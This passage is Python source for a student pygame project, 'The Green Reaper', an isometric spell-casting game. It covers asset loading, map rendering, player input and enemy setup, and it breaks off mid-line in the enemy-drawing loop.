h.solve()\n","repo_name":"srebughini/ASALIPY","sub_path":"tests/Heterogeneous1DReactor/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"17534929487","text":"'''\nName: Thomas Luc\nDate: Jan 22, 2021\nClass Code: ICS3U\nTeacher: Mrs. Bokhari\n\nDescription: An (environmentally-friendly) game called 'The Green Reaper', made with the pygame Python module.\nThe player controls a 'grim reaper' character and casts spells using a 3x3 to kill different enemies. The premise\nof the story is that the character is killing off 'mutations' which originated from pollution, and in doing so, cleans\nthe planet. There are 5 different zones to go through, with increasing difficulty. 
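# [sketch, not part of the original file] The isometric look this game aims for
# comes down to one coordinate transform, used throughout the render loop further
# down: grid cell (x, y) is drawn at screen position
# (200 + x*bv - y*bv, 10 + x*bv + y*bv), with bv = 50. A tiny standalone check:
bv = 50

def iso_project(x, y):
    # +x moves right and down, +y moves left and down: hence the diamond grid
    return (200 + x * bv - y * bv, 10 + x * bv + y * bv)

assert iso_project(0, 0) == (200, 10)
assert iso_project(1, 0) == (250, 60)
assert iso_project(0, 1) == (150, 60)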
The game mimics an isometric style rendering,\nso each tile appears to look three dimensional.\n\nReferences:\nHUGE thanks to DaFluffyPotato for his extremely helpful pygame tutorials:\nHis channel: https://www.youtube.com/channel/UCYNrBrBOgTfHswcz2DdZQFA\nThe tutorials I used for this project:\n-https://www.youtube.com/watch?v=gE2gTCwLdFM: Isometric Rendering \n-https://www.youtube.com/watch?v=5q7tmIlXROg: Game Scroll Effect\n-https://www.youtube.com/watch?v=4cYAkHfh9wM: Pixel Art\n-https://www.youtube.com/watch?v=l-GUfEJcTH4: Animations \n\n'''\n\n# importing modules ---------------------------------------------#\n\nimport pygame\n\nimport data.scripts.math_functions as m\nimport data.scripts.effects as e\n\n# setting up pygame ---------------------------------------------#\n\npygame.init()\npygame.display.set_caption('The Green Reaper')\nsize = (screen_width, screen_height) = (900,600)\nscreen = pygame.display.set_mode(size)\ntemp_display = pygame.Surface((300,300))\nclock = pygame.time.Clock()\nFPS = 60\nframe_count = 0\nsecond_frame_count = 0\nanimation_frame_surfaces = {} # holds all the frames' surfaces\nanimations_dictionary = {} # holds a list for every animation type, the keys being the name of each animation\n\n# helpful functions and code---------------------------------------------#\n\n\ndef load_image(filename,*args): # used to load in each image from the 'images' directory. optional arguments to specify colorkey.\n surface = pygame.image.load('data/images/' + filename + '.png')\n if len(args) != 0 and args[0]: # if an optional argument was specified and it is 'True'\n surface.set_colorkey((255,255,255)) # make white bg transparent\n else:\n surface.set_colorkey((0,0,0)) # make black bg transparent\n return surface\n\n\ndef load_animation(directory,frame_frequency,**kwargs): # used to load in each animation in the game\n global animation_frame_surfaces # each actual frame contained in the specified animation will be added to this dictionary\n animation_name = directory.split('/')[-1]\n animation_frame_names = [] # this list will hold just the names (string) of each frame_name for the ENTIRE animation\n\n for num, frame in enumerate(frame_frequency): # frame_frequency holds a list, ex. [1,1] specifying how many times each frame should appear in an animation\n frame_name = animation_name + str(num) # create the name of the frame\n frame_location = directory + '/' + frame_name + '.png' # create the location of the frame image, using the frame_name var\n frame_image = pygame.image.load(frame_location).convert() # load in each frame image\n frame_image.set_colorkey((255,255,255)) # sets white bg to transparent\n\n if 'size' not in kwargs: # if the keyworded argument 'size' was not given, this executes\n frame_image = pygame.transform.scale(frame_image,(100,100)) # by default, each frame will be 100x100 px\n else:\n frame_image = pygame.transform.scale(frame_image,kwargs['size']) # if a size was specified, each frame image will become that size\n\n animation_frame_surfaces[frame_name] = frame_image.copy() # load into dictionary the frame name + its actual surface\n\n for _ in range(frame): # frame is equal to the number in each index of frame_frequency. 
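# [illustration with made-up values, not from the original file] frame_frequency
# controls how long each frame is held: with [2, 3] the returned name list holds
# frame 0 twice and frame 1 three times, so advancing one index per game tick
# plays each frame for its intended number of ticks:
frame_frequency = [2, 3]
animation_frame_names = []
for num, count in enumerate(frame_frequency):
    animation_frame_names.extend(['idle' + str(num)] * count)

assert animation_frame_names == ['idle0', 'idle0', 'idle1', 'idle1', 'idle1']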
e.g [1,1] --> frame = 1 when this loop first iterates\n animation_frame_names.append(frame_name) # frame_name will be appended 'frame' (frame is a num) times.\n\n return animation_frame_names # return all the frame names for the animation.\n\n\ndef change_animation(animation_name,frame,new_animation,lock): # used to change the player's animation during the game\n if animation_name != new_animation and not lock: # animation_name represents the char's current animation. if it is the same as the proposed new animation, don't change it\n char_animation = new_animation # otherwise, we save the new animation in a var\n char_frame = 0 # reset the char's current frame to 0 so we start at the first frame of the new animation\n return char_animation, char_frame # return the name of the new animation to change to + the char's frame (0)\n return animation_name,frame # this will just return the same values found in the parameters\n\n\ndef create_font(font_size): # this returns the 'Silver' font with the specified size\n return pygame.font.Font('data/Silver.ttf', font_size)\n\n\ndef create_bg(col): # this is used to create the diagonal stripes seen in the background\n y = -150 # the polygon y-offset\n poly_points1 = [(0,150+y),(900,0+y),(900,100+y),(0,250+y)] # each set of poly points have increasing y values\n poly_points2 = [(0,350+y),(900,200+y),(900,300+y),(0,450+y)]\n poly_points3 = [(0,550+y),(900,400+y),(900,500+y),(0,650+y)]\n poly_points4 = [(0,750+y),(900,600+y),(900,700+y),(0,850+y)]\n\n pygame.draw.polygon(screen,col,poly_points1,0)\n pygame.draw.polygon(screen,col,poly_points2,0)\n pygame.draw.polygon(screen,col,poly_points3,0)\n pygame.draw.polygon(screen,col,poly_points4,0)\n\n\ndef load_map(map_num): # used for returning the map information of the map_num passed\n map_name = 'map' + str(map_num) # create the name of the map that we're opening\n f = open('data/maps/' + map_name + '.txt', 'r')\n map_data = [[tile for tile in tile_row.rstrip(\"\\n\")] for tile_row in f] # returns a nested list. 
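# [illustration with a made-up map, not from the original file] load_map turns
# each text row into a list of one-character tile codes, indexed current_map[y][x]:
rows = ['110\n', '1e1\n']
map_data = [[tile for tile in row.rstrip('\n')] for row in rows]

assert map_data == [['1', '1', '0'], ['1', 'e', '1']]
assert map_data[1][1] == 'e'  # row 1, column 1 holds an enemy tile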
each list holds the individual characters of one row\n f.close()\n return map_data\n\n\n# creating game over screen\nbackdrop = pygame.Surface((900,600)) # backdrop used to place on top of glitchy screen\nbackdrop.set_alpha(150) # make it semi-transparent so the user can still see the glitchy screen\ngame_over_font, game_over_font_2 = create_font(70), create_font(40)\ngame_over_txt = game_over_font.render('game over.', True,(194, 194, 194))\ngame_over_rect = game_over_txt.get_rect() # create a rectangle from the given text\ngame_over_rect.center = (450,300) # set its center so that I can easily display an element where I want it\ngame_over_txt_2 = game_over_font_2.render('press \\'r\\' to retry the level.', True, (204, 20, 20))\ngame_over_rect_2 = game_over_txt_2.get_rect()\ngame_over_rect_2.center = (450,350)\nending_txt_font, ending_txt_font2 = create_font(100), create_font(70)\nending_txt = ending_txt_font.render('thanks for playing!',True,(255,255,255))\nending_txt2 = ending_txt_font2.render('(and more importantly, saving the earth.)',True,(143, 146, 150))\nending_txt_rect, ending_txt_rect2 = ending_txt.get_rect(), ending_txt2.get_rect()\nending_txt_rect.center, ending_txt_rect2.center = (450,270), (450,375)\n\nlevel_transition = pygame.Surface((900,600)) # screen used as transition\nlevel_transition.fill((255,255,255)) # fill bg with white\nlevel_transition_alpha = 0 # var to hold the Surface's alpha val\nlevel_fade = False\nlevel_timer = 0\n\ngame_border = load_image('border',True).convert()\ngame_border = pygame.transform.scale(game_border,(900,600))\n\n# loading in game variables ----------------------------------------------------------------------------#\n\n# loading in intro message\nf = open('data/maps/game_intro.txt','r')\nintro_text = ''\nfor line in f:\n line = line.rstrip(\"\\n\") + ' '\n intro_text += line \nf.close()\n\n# loading in animations\nanimations_dictionary['idle'] = load_animation('data/images/animations/idle',[20,20])\nanimations_dictionary['walk'] = load_animation('data/images/animations/walk',[10,10,10])\nanimations_dictionary['jump'] = load_animation('data/images/animations/jump',[2,2,4,2,4,1])\nanimations_dictionary['slash'] = load_animation('data/images/animations/slash',[10,8,6,4,3],size=(200,200))\nanimations_dictionary['thunder'] = load_animation('data/images/animations/thunder',[2,2,2,2,2,2,2,2,2,2,5,2,2,2],size=(105,355))\nanimations_dictionary['slime'] = load_animation('data/enemies/slime',[15,15,15],size=(85,55))\nanimations_dictionary['slime_dmg'] = load_animation('data/enemies/damage/slime_dmg',[10],size=(85,55))\nanimations_dictionary['death'] = '' # empty for now as this animations are created depending on the char's current animation\nanimations_dictionary['screen_glitch'] = '' # empty for now as this animation requires a copy of the current screen when the char dies\n\n# game HUD (head up display)\nmana_bar = load_image('mana_bar',True).convert()\nmana_bar = pygame.transform.scale(mana_bar,(240,48))\nenemy_counter = load_image('enemy_count').convert()\nenemy_counter.set_colorkey((255,0,0))\nenemy_counter = pygame.transform.scale(enemy_counter,(234,102))\nenemy_counter_bg = pygame.Surface((205,65))\nenemy_counter_bg.fill((125, 125, 125))\nenemy_counter_bg.set_alpha(100)\nenemy_counter_font = create_font(55)\nlevel_header = load_image('level',True).convert()\nlevel_header = pygame.transform.scale(level_header,(288,80))\nlevel_font = create_font(50)\nscroll = load_image('scroll',True).convert()\nscroll = 
pygame.transform.scale(scroll,(600,728))\nscroll_font = create_font(30)\n\n# char animation variables\nchar_current_animation = 'idle' # create variable to hold character's current animation\nchar_current_frame = 0 # holds the char frame. it is used to draw the appropriate frame in an animation sequence\nchar_animation_flip = False # flip the frame depending on direction moving\nchar_animation_lock = False # used in change_animation function. if True, the char's animation will not change\n\n# level variables\ngame_running = True # bool val which is used by the main game loop\ncurrent_level = 1 # hold the current level\ncurrent_map = load_map(current_level) # load in the map one\ngame_scroll = [0,0] # allows the game to stay centered on the player as they move. 0th index = x-offset, 1st index = y-offset\nnumber_of_enemies = 0 # hold the original number of enemies on the current level\nfound_enemies = False\nfound_tvs = False\nsave_screen = None\nlevel_retry = False\nscroll_obj = [[450 - scroll.get_width()//2,700],True] # IN ORDER: scroll location (x,y), scroll active\n\n# game assets\nbridge = load_image('bridge').convert()\nbridge_reverse = pygame.transform.flip(bridge,True,False)\nbridge, bridge_reverse = pygame.transform.scale(bridge,(101,169)), pygame.transform.scale(bridge_reverse,(101,169))\ngreen_block, pink_block = load_image('ground_green').convert(), load_image('ground_pink').convert()\ngreen_block, pink_block = pygame.transform.scale(green_block,(101,170)), pygame.transform.scale(pink_block,(101,170))\ngreen_tree, pink_tree = load_image('green_tree').convert(), load_image('pink_tree').convert()\ngreen_tree, pink_tree = pygame.transform.scale(green_tree,(120,189)), pygame.transform.scale(pink_tree,(120,189))\ngreen_rock, pink_rock = load_image('green_rock').convert(), load_image('pink_rock').convert()\ngreen_rock, pink_rock = pygame.transform.scale(green_rock,(80,80)), pygame.transform.scale(pink_rock,(80,80))\nbroken_tv = load_image('tv',True).convert()\nbroken_tv = pygame.transform.scale(broken_tv,(80,90))\nbullet = load_image('bullet',True).convert()\nbullet = pygame.transform.scale(bullet,(30,30))\n\n# map tile variables\nfound_tiles = False\nfound_tiles_ypos = False\nbv = 50 # number which scales the x and y distance between each rendered tile\nactive_block, active_tree, active_rock = green_block, green_tree, green_rock # these three variables hold the current asset to be displayed, as blocks/trees/rocks have two potential colours\nactive_bg_col, active_bg_col2 = (45, 53, 61), (82, 96, 110) # variables to hold the current background colours\n\nclean_block = load_image('ground_clean').convert() # load in clean assets (blocks/trees/rocks) for when the player clears the level\nclean_block = pygame.transform.scale(clean_block,(101,170))\nclean_tree = load_image('clean_tree').convert()\nclean_tree = pygame.transform.scale(clean_tree,(120,189))\nclean_rock = load_image('clean_rock').convert()\nclean_rock = pygame.transform.scale(clean_rock,(80,80))\n\n# enemies\nslime_obj = ['slime',[0,0],0,[],'right',None,'move',False,2,255] # IN ORDER: name, location, current frame, enemy tiles, direction, hp_bar, animation, display hp_bar, hp, alpha\ntv_obj = [broken_tv,[],None,[],0,True, 255, 0] # IN ORDER: frame, location, hitbox, bullet list, bullet angle, show on screen bool, alpha, angle\nactive_enemies = [] # variable to hold all active slimes\nactive_tvs = [] # variable to hold all active TVs\nhp_bar = load_image('health_bar',True).convert()\nhp_bar = 
pygame.transform.scale(hp_bar,(55,15))\n\n# character variables\nchar_spawn = [100,0] # character initial spawn location on map\nchar_x, char_y = (100,100) # character x/y values\nchar_speed = 3\nchar_up = False # up/down/left/right bool vals will turn True if their respective directional keys are held down. upon release, they become False\nchar_down = False\nchar_left = False\nchar_right = False\nchar_jump = False # becomes True if the character is jumping (spacebar is pressed)\nchar_fall = False # becomes True if the character is falling down from jump\nchar_acceleration = 0 # for changing character's vertical acceleration\nchar_prev_pos = 0 # used to store character's previous y position after a jump, for when they land\nchar_mana = 255 # character's mana\nchar_alive = True\nchar_loaded = False\n\nchar_scythe = load_image('scythe',True).convert() # scythe which appears to be on the back of the character\nchar_scythe = pygame.transform.scale(char_scythe,(135,135))\nchar_shadow = load_image('char_shadow',True).convert()\nchar_shadow.set_alpha(200)\ndisplay_shadow = True # character's shadow will show below their feet if this bool is True\n\n# char spell casting variables\ngrid_point = load_image('grid_point',True).convert() # each 'grid point' or 'dot' on the 3x3 grid\ngrid_point = pygame.transform.scale(grid_point,(30,30))\nspell_bg = load_image('spell_bg',True).convert() # the frame seen around the 3x3 grid\ngrid_scale = 1 # adjust the gap between grid points\ngrid_point_diff = 1 # used to increase the difference in distance between each point, to make the grid expand\ngrid_points = [] # holds the locations of all 3x3 grid points\ngrid_max = False # turns True once the grid becomes a certain size\nactive_point = 4 # holds a num which corresponds to a certain grid point. the line being drawn will always start at this grid point\nslash_pic = load_image('slash',True).convert() # picture of the 'slash' attack pattern for scroll tutorial\nslash_pic = pygame.transform.scale(slash_pic,(150,150))\nthunder_pic = load_image('thunder',True).convert() # picture of the 'thunder' attack pattern for scroll tutorial\nthunder_pic = pygame.transform.scale(thunder_pic,(150,150))\n\nspells_dictionary = {\n 'slash': [[2, 1, 0, 3, 6],50], # 0th index: each number represents a grid point which must've been drawn to. this is the spell pattern. 1st index: spell mana cost\n 'thunder': [[1, 3, 4, 5, 7],100]\n}\n\nspell_cast = [False,[0,0],[],[],['',0,[0,0]]] # spell active, grid location, line points, points touched, [current spell active, its frame,[location]]\n\n# glitch colours\nglitch_colours = [(16, 26, 86),(22, 45, 118),(36, 86, 196),(195, 20, 118),(51, 7, 57),(28, 93, 129),(163, 127, 241),(99, 24, 79),(69, 173, 204)]\ngsl = 0 # grow side length - used to scale up certain glitch effects, such as the one found in the 3x3 grid\n\n# intro variables\nrunning = True\nintro_overlay_surf = pygame.Surface((900,600))\nintro_overlay_surf.set_alpha(200)\nintro_font = create_font(27)\narrow_font = create_font(70)\ntext_rect = pygame.Rect(50,50,800,500)\nintro_framecount = 0\n\n# introductory game loop ---------------------------------------------------------------------------------------------------------------#\nwhile running:\n mx, my = pygame.mouse.get_pos() # vars for holding mouse position\n glitch_bgs = e.create_glitch_effect(900,height=600) # returns a list containing each Surface a part of the 'glitch' effect. 
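# [sketch only: create_glitch_effect lives in data/scripts/effects.py, which is
# not shown, so this is a guess at the general technique rather than the real
# implementation, and every name below is hypothetical] Stacking a few
# semi-transparent Surfaces filled with random colour bars gives a similar effect:
import random
import pygame

def make_glitch_layers(width, height, colours, n_layers=3):
    layers = []
    for _ in range(n_layers):
        surf = pygame.Surface((width, height))
        surf.set_colorkey((0, 0, 0))  # untouched black stays transparent
        for _ in range(20):  # a handful of random colour bars per layer
            x, y = random.randrange(width), random.randrange(height)
            w, h = random.randrange(10, 120), random.randrange(2, 12)
            pygame.draw.rect(surf, random.choice(colours), (x, y, w, h))
        surf.set_alpha(random.randrange(60, 160))  # vary layer translucency
        layers.append(surf)
    return layers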
there are three overall layers\n arrow_str = '>' * (intro_framecount // 20 + 1) # this will be a str with 1,2 or 3 '>' symbols depending on the frame count\n arrow_text = arrow_font.render(arrow_str,True,(255,255,255))\n arrow_text_rect = arrow_text.get_rect()\n arrow_text_rect.center = (800,550)\n\n for glitch_bg in glitch_bgs: # blit each Surface in the glitch_bgs list onto the screen\n screen.blit(glitch_bg,(0,0))\n\n screen.blit(intro_overlay_surf,(0,0))\n m.drawText(screen,intro_text,(255,255,255),text_rect,intro_font,aa=True,bkg=None) # use drawText function to draw text, which automatically wraps depending on the rectangle passed as parameter\n screen.blit(arrow_text,arrow_text_rect)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN and arrow_text_rect.collidepoint(mx,my): # check for when the user presses the arrow\n running = False # stop the loop so that the program starts executing the main game loop\n\n if intro_framecount < 59:\n intro_framecount += 1\n else:\n intro_framecount = 0\n\n clock.tick(60)\n pygame.display.update()\n\n# main loop ----------------------------------------------------------------------------------------------------------------#\nwhile game_running:\n # important game variables\n blocks = [] # holds the block tiles\n trees = [] # holds the tree tiles\n rocks = [] # holds the rock tiles\n char_center = (char_x - game_scroll[0] + 40,char_y - game_scroll[1] + 45) # this location represents the center of the character at all times // used for tile rendering\n character_hitbox = pygame.Rect(char_x - game_scroll[0] + 10, char_y - game_scroll[1] + 10, 70, 90) # Rect object representing the character's overall hitbox\n character_feet_hitbox = pygame.Rect(char_x - game_scroll[0] + 10, char_y - game_scroll[1] + 80, 70, 20) # Rect object representing the character's smaller feet hitbox\n\n # background\n screen.fill(active_bg_col)\n create_bg(active_bg_col2)\n\n # control game scroll\n game_scroll[0] += (char_x - game_scroll[0] - 450 + 37) / 40\n game_scroll[1] += (char_y - game_scroll[1] - 300 + 50) / 40\n\n # event detection -----------------------------------------------------#\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN: # handle all events regarding keys being pressed down\n if event.key == pygame.K_w: # if 'w' was pressed, char is moving up. set char_up to True\n char_up = True\n if event.key == pygame.K_s: # same concept as with 'w' key\n char_down = True\n if event.key == pygame.K_a:\n char_left = True\n if event.key == pygame.K_d:\n char_right = True\n if event.key == pygame.K_SPACE and char_jump is False and char_fall is False: # if space was pressed, the character isn't already jumping, and they are not currently falling\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'jump',char_animation_lock) # changes the current ani. 
to 'jump' and sets current frame to 0\n char_animation_lock = True # lock animation so that character's animation will not change to 'walk' if user presses WASD\n char_prev_ypos = char_y # store char's y pos before they jump\n char_jump = True\n char_acceleration = 20 # set character's acceleration\n if event.key == pygame.K_r and not char_alive: # handle level retrying: if the character is dead and the user presses 'r', this executes\n level_retry = True\n if event.key == pygame.K_e: # for opening level scroll, executes if 'e' is pressed\n scroll_obj[1] = not scroll_obj[1] # changes the scroll's active state to the inverse of what it was before (if on, turns off // if off, turns on)\n if event.type == pygame.KEYUP: # handle all events regarding keys being lifted up\n if event.key == pygame.K_w: # if 'w' is lifted up, the char is no longer moving up. set char_up to False\n char_up = False\n if not char_jump: # if the character is currently not jumping (and also 'w' is lifted up), this will execute\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock) # change animation to 'idle'\n if event.key == pygame.K_s: # same concept as with 'w'\n char_down = False\n if not char_jump:\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock)\n if event.key == pygame.K_a:\n char_left = False\n if not char_jump:\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock)\n if event.key == pygame.K_d:\n char_right = False\n if not char_jump:\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock)\n\n # rendering map --------------------------------------------------------------------------------------------------#\n\n enemy_tiles = [[]] # list of lists: each list inside represents all Rect objects which make up a single enemy territory. there is one slime per territory\n first_etf = False # bool variable which turns True once the first enemy tile in the map has been found\n pfet = 0 # previous first enemy tile - holds the y-value of the previous row where an enemy tile was found\n for y, tile_row in enumerate(current_map): # this nested for loop iterates through each 'tile' in current_map, which holds all tiles (represented by characters, check map text files for more info)\n found_e_tile = False # becomes True once an enemy tile has been found in the current row\n for x,tile in enumerate(tile_row):\n if tile != \"0\" and tile != \"4\" and tile != \"5\": # every tile that is not '0', '4' or '5' # requires a base/ground tile which the player can walk on\n block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0], (10 + x * bv + y * bv) - game_scroll[1], 101, 101) # create a Rect object whose coords depend on the current x/y values of the for loop, and game scroll\n green_block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0], (10 + x * bv + y * bv) - game_scroll[1],green_block.get_width(),green_block.get_height()) # create a Rect whose coords again depend on x/y, where the tile Surface will be displayed\n blocks.append([block_rect,green_block_rect]) # each pair of rectangles is appended as a list to 'blocks', which holds all tiles the game will render later\n if tile == \"2\": # tile num. 
2 represents a tree\n tree_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] - 10, (10 + x * bv + y * bv) - game_scroll[1] - green_tree.get_height() + 80, green_tree.get_width(),green_tree.get_height()) # create Rect obj for tree to be blitted, same concept as before\n tree_hitbox = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] - green_tree.get_height() + 80, green_tree.get_width()-20,green_tree.get_height()-20) # create Rect obj for the tree's hitbox\n trees.append([tree_rect,tree_hitbox]) # append as a list both the location Rect and hitbox Rect\n else: # 'blocks', 'trees' and 'rocks' are all related lists, so we must append None if the tile is not a tree to keep the same order\n trees.append(None)\n if tile == \"3\": # tile num. 3 represents a rock. loaded in the same exact way as trees are\n rock_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 5, green_rock.get_width(),green_rock.get_height())\n rock_hitbox = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 25, green_rock.get_width(),green_rock.get_height() // 2)\n rocks.append([rock_rect,rock_hitbox])\n else:\n rocks.append(None)\n if tile == \"6\" and not found_tvs: # tile num. 6 represents a TV enemy. found_tvs becomes True after the very first iteration of the game loop, thus this if statement occurs once\n tv_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 5, broken_tv.get_width(),broken_tv.get_height())\n # tv_hitbox = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 25, broken_tv.get_width(),broken_tv.get_height() // 2)\n tv_object = tv_obj.copy() # create a copy of the tv_obj list, which holds all potential attributes of a TV\n tv_object[1] = tv_rect # give the object tv_rect, the location where it is to be blitted\n tv_object[3] = [] # required because of how list pointers work\n active_tvs.append(tv_object) # append to list 'active_tvs' the tv object\n if tile == \"e\": # checks for enemy tile. this entire conditional is an algorithm which appends to the last list 'enemy_tiles' if an enemy tile is a part of an already existing territory. if not, it appends an empty list to 'enemy_tiles' to symbolize a different territory\n if not first_etf: # this conditional executes once per frame. 
once the first enemy tile is found bool var 'first_etf' becomes True\n pfet = y # set the previous first tile to the current y value, because for the first enemy tile there is no 'previous enemy tile'\n first_etf = True\n found_e_tile = True\n if not found_e_tile: # for every row of tiles, bool var found_e_tile is False until an e tile is found\n if y - 1 == pfet: # if this first enemy tile has a y value of 1 more than pfet, it must be a part of the same enemy territory\n enemy_tiles[-1].append(block_rect) # append the Rect tile to the last list in enemy_tiles\n pfet = y # update pfet to the current y value, so that the next row tests against this value\n found_e_tile = True # set found_e_tile to True so this conditional can only execute once\n else: # this will execute if the current y value has a difference more than 1 with pfet\n enemy_tiles.append([]) # create an empty list to represent a new enemy territory\n enemy_tiles[-1].append(block_rect) # append to the last list, i.e the one we just created the Rect object\n pfet = y # update pfet for next iteration\n found_e_tile = True # set to True so this conditional can only execute once per row\n else: # this will execute once an enemy tile has already been found in the row\n enemy_tiles[-1].append(block_rect) # if an enemy tile exists in the row, the tile must belong with that enemy tile's territory\n elif tile == \"4\": # tile num. 4 represents a bridge.\n block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], 101, 101)\n bridge_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], bridge.get_width(),bridge.get_height())\n blocks.append([block_rect, bridge_rect])\n trees.append(None)\n rocks.append(None)\n elif tile == \"5\": # tile num. 5 represents a bridge facing diagonally to the right (same bridge tile as before, but mirrored)\n block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], 101, 101)\n bridge_rev_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], bridge_reverse.get_width(),bridge_reverse.get_height())\n blocks.append([block_rect, bridge_rev_rect, 'r']) # additionally append string lateral 'r', which stands for reverse. this allows the program to diffrentiate from left/right facing bridges\n trees.append(None)\n rocks.append(None)\n\n # create the list of enemies\n if len(active_enemies) == 0: # list 'active_enemies' will be empty during the very first frame of each level\n for _ in enemy_tiles: # enemy_tiles is a list of lists, containing all the enemy territories (which are made up of sequences of tiles)\n active_enemies.append(slime_obj.copy()) # for each territory, append a copy of slime_obj as there will be one slime per territory\n\n # save number of tvs\n if not found_tvs: # will only execute once per level\n number_of_tvs = len(active_tvs)\n found_tvs = True # once we have saved the original number of TVs, bool var found_tvs becomes False\n\n # hold the original number of enemies on the stage. 
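# [illustration with made-up row numbers, not from the original file] The
# territory-building logic above keys on rows: an enemy row adjacent to the
# previous enemy row joins the current territory, while a larger gap opens a
# new one. Distilled to just the row numbers:
enemy_rows = [2, 3, 4, 7, 8]
territories, prev = [], None
for y in enemy_rows:
    if prev is None or y - prev > 1:
        territories.append([])  # non-adjacent row: start a new territory
    territories[-1].append(y)
    prev = y

assert territories == [[2, 3, 4], [7, 8]]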
e.g if ZONE 1 has 5 enemies, this will store 5 every frame\n number_of_enemies = len(active_enemies) + len(active_tvs) # take the sum of the list lengths of active_enemies and active_tvs, as they are the mobs the player fights\n\n # create a list ONCE containing boolean values for each tile // this is for creating a 'render distance' effect\n if not found_tiles:\n tile_render_states = [False for block in blocks] # each block tile will get its own bool var starting at False. once it becomes True, the block is permanently rendered on the screen for that level\n found_tiles = True\n\n # checking if a certain tile should be rendered on screen\n for num, block_info in enumerate(blocks): # use enumerate to keep track of the block number, as tile_render_states is a related list\n block_center = (block_info[1].x + block_info[1].w // 2, block_info[1].y + block_info[1].h // 2) # represent the center of actual tile image. block_info[1] corresponds to 'green_block_rect', has same dimensions as the tile's image\n\n if m.check_rect_distance(char_center,block_center,500): # func returns True if distance between character's current center and the block_center created just above is less than 500\n tile_render_states[num] = True # set the current block's render state to True\n\n if tile_render_states[num]: # if a tile's render state is True, blit its actual Surface onto the screen depending on its dimensions\n if block_info[1].h == 170: # the ground tile's Surface height is 170, so this will blit a ground tile at the specified location (block_info[0]) holds the blit location in the form of a Rect\n screen.blit(active_block, block_info[0])\n elif block_info[1].h == 169 and 'r' not in block_info: # the bridge tile has a height of 169. if 'r' is not found, it will blit a left facing bridge at the specified location\n screen.blit(bridge, block_info[0])\n else: # otherwise, the base tile must be a reverse bridge, so blit a reversed bridge at the specified location\n screen.blit(bridge_reverse, block_info[0])\n\n if trees[num] is not None: # if at the current index a tree list is found (looks like this [tree_rect,tree_hitbox]), blit a tree at that location\n screen.blit(active_tree,trees[num][0])\n if rocks[num] is not None: # if at the current index a rock list is found, blit a rock at the location\n screen.blit(active_rock,rocks[num][0])\n\n for j, area in enumerate(enemy_tiles): # iterate through each territory (area) in enemy_tiles\n for i, e_tile in enumerate(area): # iterate through each individual tile in the area\n if i == 0 and active_enemies[j][1][0] == 0 and active_enemies[j][1][1] == 0: # active_enemies[j][1] represents the slime at index j's location, in the form of [x,y]. this conditional will evaluate once for each slime object as they start off with location [0,0]\n active_enemies[j][1] = [e_tile.x, e_tile.y] # this represents the slime's spawning location within its territory. it is the first tile in the upper left corner of its area.\n active_enemies[j][3].append(e_tile) # append each 'territory tile' to slime's territory tiles list\n\n # handling all enemy actions, drawing the enemy, moving it, etc. 
-------------------------------------------------------------------#\n for e_num, enemy in enumerate(active_enemies): # iterate through each slime enemy in active_enemies, var enemy represents a list containing all necessary info\n enemy_loc = enemy[1] # store the current enemy's location, enemy_loc is in the form of [x,y]\n enemy_left = False # bool val to check whether or not a slime has left its territory\n\n if enemy[6] == 'move': # index 6 represents the slime's animation. if it is 'move', set the enemy's current frame (animation) to its default\n enemy_cf = animations_dictionary[enemy[0]][enemy[2]] # enemy_cf stands for enemy current frame and holds a frame name (e.g slime0). enemy[0] is equal to 'slime' and enemy[2] holds the slime's frame number, so that new frames can be are played\n else: # slime has two possible animations, the other being when it is hurt\n enemy_cf = animations_dictionary['slime_dmg'][enemy[2]] # set the current frame to be a part of the 'slime_dmg' animation\n\n enemy_surf = animation_frame_surfaces[enemy_cf] # given the name of the frame, grab its actual Surface to be blitted from dictionary\n enemy_surf.set_alpha(enemy[9]) # enemy[9] represents the alpha each slime frame should have. this allows the slime to 'fade out' once it dies\n enemy[5] = pygame.Rect(enemy_loc[0] - game_scroll[0],enemy_loc[1] - game_scroll[1],animation_frame_surfaces[enemy_cf].get_width(),animation_frame_surfaces[enemy_cf].get_height()) # create a Rect object representing the enemy's current hitbox, which is offsetted by the game's scroll\n\n if char_loaded: # bool val that turns True once character's hitboxes are created, because as of now they do not exist\n if not char_up: # if the character is not moving upwards, its hitbox will be its feet\n if enemy[5].colliderect(character_feet_hitbox) and enemy[9] >= 255: # check for slime hitbox + char hitbox collision and also if whether or not the slime is on the screen (alpha >= 255)\n char_alive = False # if collision occured, character is dead, set char_alive to False\n else: # otherwise, its hitbox will be its shadow\n if enemy[5].colliderect(character_feet_shadow) and enemy[9] >= 255:\n char_alive = False\n\n if enemy[7]: # bool val // if true, display slime's HP bar\n screen.blit(hp_bar,[enemy_loc[0] - 